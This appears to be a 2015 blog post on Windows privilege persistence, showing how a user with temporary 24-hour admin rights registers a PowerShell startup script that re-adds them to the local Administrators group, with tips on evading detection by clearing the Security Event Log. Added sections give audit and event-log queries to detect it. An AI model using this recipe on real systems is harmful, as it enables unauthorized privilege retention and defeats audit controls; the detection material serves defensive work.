19 January 2015
Once you have granted a user 24h admin rights, he is able to grant himself privileges again with just a few clicks. Startup scripts give an easy means to do this.
About startup scripts.
With startup scripts, Windows offers administrators a powerful tool to run commands at system boot. Scripts are stored in the directory %windir%\System32\GroupPolicy\Machine\Scripts\Startup and executed with system privileges.
But just adding a script to the startup directory is not sufficient to execute it. Because startup scripts could easily be used to compromise a system, they have to be enabled through the Local Group Policy Editor gpedit.msc, and enabling a startup script with gpedit.msc requires at least local admin privileges.
3 Steps for 24h admins to get admin privileges again.
- Create a PowerShell script for adding your user account to the local administrators group.
# addMalUser.ps1
$Domain   = "YourDomain"     # NetBIOS domain name (USERDOMAIN in the output of 'set')
$Computer = "YourComputer"   # local computer name (COMPUTERNAME in the output of 'set')
$Username = "YourUsername"   # account to add (USERNAME in the output of 'set')
$Group = [ADSI]"WinNT://$Computer/Administrators,group"   # local Administrators group via the WinNT provider
$User  = [ADSI]"WinNT://$Domain/$Username,user"           # the domain account to add
$Group.Add($User.Path)
Save this script to file addMalUser.ps1. To get the exact values for $Domain, $Computer and $Username please run set in a command prompt.
- Copy script addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.
- Start gpedit.msc and add script addMalUser.ps1 to the startup scripts.
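The three steps above leave artifacts in three places: the Startup directory, the scripts.ini/psscripts.ini file that gpedit.msc writes next to it, and the registry copy of that configuration which the Group Policy client reads at boot. The following audit script is an added example for administrators and is not code from the original post; the paths are the standard local-GPO locations, and the $KnownGood list is an assumption to be filled with the startup scripts your organisation deploys deliberately.

```powershell
# Added example (not part of the original post): list every locally registered
# startup script so that an unexpected one such as addMalUser.ps1 stands out.
$ScriptsRoot = Join-Path $env:windir 'System32\GroupPolicy\Machine\Scripts'
$StartupDir  = Join-Path $ScriptsRoot 'Startup'
$IniFiles    = @('scripts.ini', 'psscripts.ini') | ForEach-Object { Join-Path $ScriptsRoot $_ }
$RegRoot     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup'
$KnownGood   = @()   # assumption: names of scripts deployed on purpose, e.g. @('inventory.ps1')

function Get-Verdict([string]$Name) {
    if ($KnownGood -contains $Name) { 'known' } else { 'UNEXPECTED' }
}

"== 1. Files in $StartupDir =="
if (Test-Path $StartupDir) {
    Get-ChildItem -Path $StartupDir -File -Force | ForEach-Object {
        '{0,-10} {1,-30} modified {2}' -f (Get-Verdict $_.Name), $_.Name, $_.LastWriteTime
    }
} else {
    'directory absent: no local startup scripts have been configured on this machine'
}

"`n== 2. Entries registered through gpedit.msc (scripts.ini / psscripts.ini) =="
foreach ($ini in $IniFiles) {
    if (-not (Test-Path $ini)) { continue }
    # Each registered script appears as "<index>CmdLine=<name>" under [Startup].
    Select-String -Path $ini -Pattern '^(\d+)CmdLine=(.+)$' | ForEach-Object {
        $name = $_.Matches[0].Groups[2].Value
        '{0,-10} {1,-30} in {2}' -f (Get-Verdict $name), $name, (Split-Path $ini -Leaf)
    }
}

"`n== 3. Registry copy read by the Group Policy client at boot =="
if (Test-Path $RegRoot) {
    Get-ChildItem -Path $RegRoot -Recurse | Get-ItemProperty |
        Where-Object { $_.Script } | ForEach-Object {
            '{0,-10} {1,-30} {2}' -f (Get-Verdict $_.Script), $_.Script, $_.PSPath
        }
} else {
    'registry key absent: nothing registered'
}
```

Run it from an elevated PowerShell prompt; reading the GroupPolicy folder and the HKLM key requires administrative rights. A script that appears in the Startup directory but in none of the .ini files is merely staged; one that appears in all three places is live and will run as SYSTEM at the next boot.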
Tips for would-be malicious users.
- Please note that this operation is recorded in the Security Event Log of your computer. Never mind! Only very few organizations are scanning security events on user workstations. Those which tolerate 24h admin rights are certainly not amongst them.
- Please feel free to add switches to this script to run it on demand only. This will help to hide your malicious activities, because you could remove yourself from the admin group or reset the Security Event Log after the job is done.
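The two tips above point at exactly the events a defender should be pulling from workstations: event 4732 ("a member was added to a security-enabled local group"), which the script produces when it runs, and event 1102 ("the audit log was cleared"), which Windows writes into the freshly cleared log when someone resets it. The query below is an added example and not part of the original post; the one-week look-back window is an assumption, and it must be run from an elevated prompt because the Security log is not readable by standard users.

```powershell
# Added example (not part of the original post): review the Security log for
# local group membership changes (4732) and audit-log clearing (1102).
$Since = (Get-Date).AddDays(-7)    # assumption: one-week look-back

# Read named EventData fields from an event rather than relying on positions.
function Get-EventData($Event) {
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

$filter = @{ LogName = 'Security'; Id = 4732, 1102; StartTime = $Since }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

foreach ($e in ($events | Sort-Object TimeCreated)) {
    if ($e.Id -eq 1102) {
        # 1102 carries its fields under UserData/LogFileCleared, not EventData.
        $u = ([xml]$e.ToXml()).Event.UserData.LogFileCleared
        '{0}  AUDIT LOG CLEARED  by {1}\{2}' -f $e.TimeCreated, $u.SubjectDomainName, $u.SubjectUserName
        continue
    }

    # 4732: TargetUserName is the group, MemberSid the account that was added,
    # SubjectUserName the account that performed the change. A startup script
    # runs as SYSTEM, so the subject is the computer account (NAME$) at boot.
    $d = Get-EventData $e
    try {
        $member = (New-Object System.Security.Principal.SecurityIdentifier $d.MemberSid).
                      Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        $member = $d.MemberSid   # SID could not be resolved (e.g. off the domain network)
    }
    $flag = if ($d.TargetUserName -eq 'Administrators' -and $d.SubjectUserName -like '*$') { 'REVIEW' } else { 'info' }
    '{0}  {1,-6} {2} added to {3} by {4}\{5}' -f $e.TimeCreated, $flag, $member,
        $d.TargetUserName, $d.SubjectDomainName, $d.SubjectUserName
}
```

The REVIEW flag deliberately targets the boot-time pattern: the local Administrators group changed by the computer account itself. If the script is instead run on demand with a switch, as the second tip suggests, the subject becomes the interactive user, so in practice every addition to Administrators on a workstation deserves a look, not only those made by SYSTEM. Clearing the log removes the 4732 entry but not the 1102 that records the clearing, and forwarding Security events to a central collector at the time they are written defeats both tips at once.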
Have Fun with 24h Admin Rights!